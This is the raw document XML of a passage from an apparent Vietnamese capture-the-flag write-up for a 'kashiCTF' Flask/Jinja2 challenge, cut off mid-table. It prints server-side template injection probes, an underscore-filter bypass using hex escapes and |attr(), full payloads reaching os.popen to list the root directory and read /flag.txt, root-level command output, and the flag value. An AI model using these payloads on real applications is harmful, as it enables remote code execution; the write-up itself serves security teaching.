          <w:b w:val="true"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>(lệnh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Linux)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•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\x72\x65\x61\x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="79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=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read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:b w:val="true"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="41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15"/>
      <w:bookmarkEnd w:id="41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16"/>
      <w:bookmarkEnd w:id="41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17"/>
      <w:bookmarkEnd w:id="41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18"/>
      <w:bookmarkEnd w:id="41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19"/>
      <w:bookmarkEnd w:id="41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0"/>
      <w:bookmarkEnd w:id="42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1"/>
      <w:bookmarkEnd w:id="421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2"/>
      <w:bookmarkEnd w:id="422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3"/>
      <w:bookmarkEnd w:id="423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4"/>
      <w:bookmarkEnd w:id="424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5"/>
      <w:bookmarkEnd w:id="42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6"/>
      <w:bookmarkEnd w:id="426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7"/>
      <w:bookmarkEnd w:id="427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8"/>
      <w:bookmarkEnd w:id="428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29"/>
      <w:bookmarkEnd w:id="429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30"/>
      <w:bookmarkEnd w:id="430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31"/>
      <w:bookmarkEnd w:id="431"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="81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32"/>
      <w:bookmarkEnd w:id="432"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="81" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="2024" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="433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6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RCE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thành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công!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uid=0(root)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gid=0(root)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groups=0(root)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="433"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="170" w:lineRule="auto" w:line="203"/>
        <w:ind w:left="2024" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="434"/>
      <w:bookmarkEnd w:id="434"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="170" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="435"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Đạt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được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RCE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với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quyền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b w:val="true"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>!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Đây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mức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cao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nhất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trên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hệ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thống.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="435"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0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36"/>
      <w:bookmarkEnd w:id="436"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="171" w:lineRule="auto" w:line="219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437"/>
      <w:bookmarkEnd w:id="437"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:spacing w:before="172" w:after="121" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="438"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:t>6.2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Liệt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kê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filesystem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tìm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="438"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="121" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="439"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Thay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lệnh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id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bằng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ls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/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(\x6c\x73\x20\x2f)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xem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thư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mục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root:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="439"/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0"/>
      <w:bookmarkEnd w:id="440"/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1"/>
      <w:bookmarkEnd w:id="441"/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2"/>
      <w:bookmarkEnd w:id="442"/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3"/>
      <w:bookmarkEnd w:id="443"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0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4"/>
      <w:bookmarkEnd w:id="444"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="115" w:lineRule="auto" w:line="219"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="445"/>
      <w:bookmarkEnd w:id="445"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="115" w:after="0" w:lineRule="auto" w:line="234"/>
        <w:ind w:left="2619" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="446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6</w:t>
      </w:r>
      <w:bookmarkEnd w:id="446"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId17" w:type="default"/>
          <w:footerReference r:id="rId18" w:type="default"/>
          <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
          <w:pgMar w:right="1071" w:left="1071" w:top="1431" w:bottom="238" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:textDirection w:val="lrTb"/>
          <w:type w:val="continuous"/>
        </w:sectPr>
      </w:pPr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1" w:after="0" w:lineRule="auto" w:line="371"/>
        <w:ind w:left="382" w:right="1295" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="463"/>
      <w:bookmarkEnd w:id="463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{{lipsum|attr('\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:spacing w:val="-6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1754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|attr('\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f')('\x6f\x73')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:spacing w:val="-58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1345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|attr('\x70\x6f\x70\x65\x6e')('\x6c\x73\x20\x2f')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:w w:val="92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|attr('\x72\x65\x61\x64')()}}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4"/>
      <w:bookmarkEnd w:id="464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5"/>
      <w:bookmarkEnd w:id="465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6"/>
      <w:bookmarkEnd w:id="466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7"/>
      <w:bookmarkEnd w:id="467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8"/>
      <w:bookmarkEnd w:id="468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69"/>
      <w:bookmarkEnd w:id="469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0"/>
      <w:bookmarkEnd w:id="470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1"/>
      <w:bookmarkEnd w:id="471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2"/>
      <w:bookmarkEnd w:id="472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3"/>
      <w:bookmarkEnd w:id="473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4"/>
      <w:bookmarkEnd w:id="474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5"/>
      <w:bookmarkEnd w:id="475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6"/>
      <w:bookmarkEnd w:id="476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7"/>
      <w:bookmarkEnd w:id="477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8"/>
      <w:bookmarkEnd w:id="478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79"/>
      <w:bookmarkEnd w:id="479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80"/>
      <w:bookmarkEnd w:id="480"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="99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81"/>
      <w:bookmarkEnd w:id="481"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="100" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="2809" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="482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7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ls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/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cho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thấy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flag.txt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ngay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tại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thư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mục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/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="482"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:lineRule="auto" w:line="203"/>
        <w:ind w:left="2809" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="483"/>
      <w:bookmarkEnd w:id="483"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:lineRule="auto" w:line="203"/>
        <w:ind w:left="2809" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="484"/>
      <w:bookmarkEnd w:id="484"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="107" w:lineRule="auto" w:line="203"/>
        <w:ind w:left="2809" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="485"/>
      <w:bookmarkEnd w:id="485"/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108" w:after="364" w:lineRule="auto" w:line="240"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="486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Đọc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Flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="486"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="364" w:after="263" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="487"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Thay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lệnh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bằng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cat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/flag.txt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đọc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nội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dung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file:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48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-116205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5981065" cy="13335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="488" name="Image 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9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631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rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="79C0FF"/>
        </w:rPr>
        <w:spacing w:before="263" w:after="0" w:lineRule="auto" w:line="371"/>
        <w:ind w:left="382" w:right="682" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="489"/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{{lipsum|attr('\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:spacing w:val="-61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2368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|attr('\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f')('\x6f\x73')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:spacing w:val="-58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pacing w:val="1959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w w:val="99"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="79C0FF"/>
        </w:rPr>
        <w:t>|attr('\x70\x6f\x70\x65\x6e')('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x2e\x74\x78\x74')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br/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>|attr('\x72\x65\x61\x64')()}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="79C0FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="489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0"/>
      <w:bookmarkEnd w:id="490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1"/>
      <w:bookmarkEnd w:id="491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2"/>
      <w:bookmarkEnd w:id="492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3"/>
      <w:bookmarkEnd w:id="493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4"/>
      <w:bookmarkEnd w:id="494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5"/>
      <w:bookmarkEnd w:id="495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6"/>
      <w:bookmarkEnd w:id="496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7"/>
      <w:bookmarkEnd w:id="497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8"/>
      <w:bookmarkEnd w:id="498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499"/>
      <w:bookmarkEnd w:id="499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0"/>
      <w:bookmarkEnd w:id="500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1"/>
      <w:bookmarkEnd w:id="501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2"/>
      <w:bookmarkEnd w:id="502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3"/>
      <w:bookmarkEnd w:id="503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4"/>
      <w:bookmarkEnd w:id="504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5"/>
      <w:bookmarkEnd w:id="505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6"/>
      <w:bookmarkEnd w:id="506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7"/>
      <w:bookmarkEnd w:id="507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8"/>
      <w:bookmarkEnd w:id="508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09"/>
      <w:bookmarkEnd w:id="509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10"/>
      <w:bookmarkEnd w:id="510"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0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11"/>
      <w:bookmarkEnd w:id="511"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="108" w:lineRule="auto" w:line="219"/>
        <w:ind w:left="383" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="512"/>
      <w:bookmarkEnd w:id="512"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="109" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="4254" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="513"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>Hình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8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—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>Flag!</w:t>
      </w:r>
      <w:bookmarkEnd w:id="513"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:lineRule="auto" w:line="204"/>
        <w:ind w:left="4254" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="514"/>
      <w:bookmarkEnd w:id="514"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="118" w:lineRule="auto" w:line="204"/>
        <w:ind w:left="4254" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="515"/>
      <w:bookmarkEnd w:id="515"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Batang" w:hAnsi="Batang" w:eastAsia="Batang" w:cs="Batang"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="3FB950"/>
        </w:rPr>
        <w:spacing w:before="119" w:after="0" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="1846" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="516"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Batang" w:hAnsi="Batang" w:eastAsia="Batang" w:cs="Batang"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="3FB950"/>
        </w:rPr>
        <w:t>kashiCTF{lo4zrfGNOi1HbEVSaF1gidjJyKczKtbr}</w:t>
      </w:r>
      <w:bookmarkEnd w:id="516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17"/>
      <w:bookmarkEnd w:id="517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18"/>
      <w:bookmarkEnd w:id="518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19"/>
      <w:bookmarkEnd w:id="519"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0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20"/>
      <w:bookmarkEnd w:id="520"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="197" w:lineRule="auto" w:line="219"/>
        <w:ind w:left="1847" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="521"/>
      <w:bookmarkEnd w:id="521"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="197" w:after="0" w:lineRule="auto" w:line="234"/>
        <w:ind w:left="2619" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="522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7</w:t>
      </w:r>
      <w:bookmarkEnd w:id="522"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId19" w:type="default"/>
          <w:footerReference r:id="rId20" w:type="default"/>
          <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
          <w:pgMar w:right="1071" w:left="1071" w:top="1374" w:bottom="238" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:textDirection w:val="lrTb"/>
          <w:type w:val="continuous"/>
        </w:sectPr>
      </w:pPr>
    </w:p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1" w:after="468" w:lineRule="auto" w:line="240"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="533"/>
      <w:bookmarkEnd w:id="533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Tóm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tắt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Attack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Chain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349885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5981065" cy="13335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="534" name="Image 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28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tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="59" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="453"/>
        <w:gridCol w:w="1815"/>
        <w:gridCol w:w="7370"/>
      </w:tblGrid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0D111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35"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="0D1117"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:bookmarkEnd w:id="5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0D111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36"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="0D1117"/>
              </w:rPr>
              <w:t>Bước</w:t>
            </w:r>
            <w:bookmarkEnd w:id="53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0D1117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37"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="0D1117"/>
              </w:rPr>
              <w:t>Mô</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="0D1117"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="0D1117"/>
              </w:rPr>
              <w:t>tả</w:t>
            </w:r>
            <w:bookmarkEnd w:id="537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38"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:bookmarkEnd w:id="53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39"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="FF4757"/>
              </w:rPr>
              <w:t>Recon</w:t>
            </w:r>
            <w:bookmarkEnd w:id="53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40"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>Wappalyzer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Flask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3.0.6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+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Python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3.11.15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Jinja2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khả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thi</w:t>
            </w:r>
            <w:bookmarkEnd w:id="540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1"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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2"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="FF4757"/>
              </w:rPr>
              <w:t>Confirm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SSTI</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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43"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>{{7*7}}→49,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{{7*'7'}}→7777777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xác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nhận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Jinja2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SSTI</w:t>
            </w:r>
            <w:bookmarkEnd w:id="543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4"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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5"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="FF4757"/>
              </w:rPr>
              <w:t>Find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Filter</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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46"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>Payload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chuẩn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bị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block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test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từng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phần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phát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hiện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_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bị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chặn</w:t>
            </w:r>
            <w:bookmarkEnd w:id="546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7"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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48"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="FF4757"/>
              </w:rPr>
              <w:t>Bypass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_</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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49"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>\x5f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thay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_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trong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string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+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|attr()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thay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dấu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chấm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bypass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hoàn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toàn</w:t>
            </w:r>
            <w:bookmarkEnd w:id="549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0"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:bookmarkEnd w:id="55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1"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="FF4757"/>
              </w:rPr>
              <w:t>Dump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globals</w:t>
            </w:r>
            <w:bookmarkEnd w:id="55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52"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>lipsum|attr('\x5f\x5fglobals\x5f\x5f')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lấy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global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namespace</w:t>
            </w:r>
            <w:bookmarkEnd w:id="552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3"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:bookmarkEnd w:id="5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4"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="FF4757"/>
              </w:rPr>
              <w:t>Load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os</w:t>
            </w:r>
            <w:bookmarkEnd w:id="55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tabs>
                <w:tab w:val="left" w:pos="337"/>
                <w:tab w:val="left" w:pos="1159"/>
              </w:tabs>
              <w:spacing w:before="144" w:after="157" w:lineRule="auto" w:line="241"/>
              <w:ind w:left="153" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:wordWrap w:val="false"/>
            </w:pPr>
            <w:bookmarkStart w:name="_GoBack" w:id="555"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="0"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="9"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>globals</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
